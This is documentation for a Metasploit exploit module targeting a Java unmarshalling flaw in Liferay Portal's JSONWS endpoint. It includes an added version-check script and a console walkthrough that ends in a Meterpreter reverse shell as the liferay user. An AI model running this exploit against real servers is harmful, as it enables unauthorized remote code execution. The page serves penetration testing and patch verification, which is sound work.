metasploit-gs/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
2020-04-14 14:01:18 -05:00

Vulnerable Application

Description

This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user.
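For inventory and patch-verification work, the affected/fixed boundaries above can be turned into a version check. The following is an added example, not code from the Metasploit module or from Liferay: it parses a Liferay CE version banner (the kind of string the Liferay-Portal response header carries, constructed here for illustration) and classifies it against the fixed releases this module names. It covers only the CE numbering listed on this page; DXP builds use different patch numbers and fall through as unknown, and like the module's own check it is version-based, so a "vulnerable" result still needs verification.

```ruby
# Added example (not part of the Metasploit module): classify a Liferay CE
# version banner against the fixed releases named in the module description.
# Version banners used below are constructed for illustration.

# First fixed release per CE branch, as [patch level, GA number].
FIXED_RELEASES = {
  '6.2' => [5, 6],   # 6.2.5 GA6
  '7.0' => [6, 7],   # 7.0.6 GA7
  '7.1' => [3, 4],   # 7.1.3 GA4
  '7.2' => [1, 2],   # 7.2.1 GA2
}.freeze

# Parse strings such as "Liferay Community Edition Portal 7.2.0 CE GA1 (...)".
# Returns [branch, patch, ga], e.g. ["7.2", 0, 1], or nil when no
# "x.y.z ... GAn" pair is recognisable.
def parse_liferay_version(banner)
  m = banner.match(/\b(\d+)\.(\d+)\.(\d+)\b.*?\bGA(\d+)\b/i)
  return nil unless m
  ["#{m[1]}.#{m[2]}", m[3].to_i, m[4].to_i]
end

# :vulnerable when the banner is older than the fixed release on its branch,
# :patched when at or past it, :unknown for unparseable banners or branches
# the module does not list (DXP 7.x.10+ numbering also ends up here).
# Version-based only: treat :vulnerable as "verify", as the module's check does.
def liferay_status(banner)
  parsed = parse_liferay_version(banner)
  return :unknown unless parsed
  branch, patch, ga = parsed
  fixed = FIXED_RELEASES[branch]
  return :unknown unless fixed
  ([patch, ga] <=> fixed) < 0 ? :vulnerable : :patched
end

if __FILE__ == $0
  # Same banner the Docker target in the Scenarios section reports.
  puts liferay_status('Liferay Community Edition Portal 7.2.0 CE GA1')  # => vulnerable
end
```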

Setup

Run docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1 (note the added 7.2.0-ga1 tag) as per Liferay's Docker Hub instructions.

Targets

Id  Name
--  ----
0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2

Verification Steps

Follow Setup and Scenarios.

Options

SRVPORT

If you are testing against the Docker container, which binds to port 8080 by default, set this to a different port so the module's remote classloading server does not collide with it.

Scenarios

Liferay Portal 7.2.0 GA1 from Docker Hub

msf5 > use exploit/multi/http/liferay_java_unmarshalling
msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer    : 588a96d744cb
OS          : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >